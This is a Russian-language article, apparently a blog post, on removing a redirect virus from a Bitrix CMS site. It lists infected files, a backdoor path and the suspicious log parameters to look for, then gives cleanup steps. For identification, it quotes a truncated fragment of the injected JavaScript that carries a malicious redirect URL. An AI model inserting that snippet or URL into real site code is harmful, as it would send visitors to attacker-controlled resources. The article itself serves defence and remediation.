Вирус в Битрикс: Изначальная ошибка, редирект на сторонние ресурсы и как избавиться от угрозы

Проблема с вирусом в Битрикс

Владельцы сайтов на платформе Битрикс нередко сталкиваются с проблемами безопасности, включая вирусные атаки. Одной из самых распространённых и опасных является ситуация, когда сайт начинает автоматически редиректить посетителей на сторонние ресурсы. Проблема усугубляется тем, что стандартные антивирусы, такие как ImunifyAV и new.virusdie.com, часто оказываются бессильными перед подобными угрозами. В этой статье мы разберем конкретный случай, где вирус прячется в файле /bitrix/header.php, и рассмотрим пошаговый план его устранения.

Обнаружение вируса

При анализе файлов вашего сайта вы можете обнаружить в файле /bitrix/header.php следующий подозрительный код:

window._KKNSbmN5mYRPSVjF||(window._KKNSbmN5mYRPSVjF={unique:!1,ttl:86400,R_PATH:"https://intrstreams.global.ssl.fastly.net/NBD8mqfG"

Этот код отвечает за редирект посетителей на сторонние ресурсы. Однако, это лишь вершина айсберга. В корне сайта может автоматически создаваться файл с бэкдором /assets/images/accesson.php, который позволяет злоумышленникам получать доступ к вашему сайту.

Уязвимость в Битрикс

Проникновение вируса стало возможным благодаря уязвимости в файле /bitrix/modules/main/include/prolog.php, через которую загружался вредоносный скрипт. Именно он создавал файл с бэкдором.

Шаги для удаления вируса

1. Проверка файлов на наличие вредоносного кода:/bitrix/modules/main/include/prolog.php
   /bitrix/header.php
   /Путь до текущего шаблона/header.php
   /Путь до текущего шаблона/footer.php
   
2. Анализ логов на предмет подозрительных запросов:Ищите в логах запросы с параметрами midog и back_url_pub. Эти параметры часто используются злоумышленниками для внедрения и активации вредоносного кода.
   

Пошаговый план действий

1. Создание резервной копии сайта: Перед любыми изменениями создайте полную резервную копию файлов и базы данных вашего сайта.
2. Удаление вредоносного кода: Удалите или очистите зараженные файлы: Откройте файлы, перечисленные выше, и удалите из них подозрительный код.
   
3. Поиск и удаление бэкдоров: Найдите и удалите файл бэкдора /assets/images/accesson.php и любые другие подозрительные файлы.
4. Обновление CMS и плагинов: Убедитесь, что ваша версия Битрикс и все установленные модули обновлены до последних версий. Это поможет закрыть известные уязвимости.
5. Настройка безопасности: Усильте меры безопасности на сайте: Установите и настройте надежный антивирус.
   Ограничьте доступ к административной панели по IP-адресам.
   Используйте сложные пароли и двухфакторную аутентификацию.
   
6. Мониторинг: Включите мониторинг файловой системы и анализируйте логи на постоянной основе для своевременного обнаружения и предотвращения новых угроз.

Заключение

Безопасность сайта — это не одноразовая задача, а постоянный процесс. Важно регулярно обновлять системы, проверять файлы и логи, а также применять лучшие практики в области кибербезопасности. Если вы столкнулись с подобной проблемой, следуйте вышеописанным шагам и не забывайте про регулярные бэкапы. В случае затруднений, всегда можно обратиться к специалистам для проведения профессионального аудита и очистки сайта от вирусов.

Поделитесь этой статьей с коллегами и друзьями, чтобы помочь им защитить свои сайты от угроз. Оставайтесь в безопасности!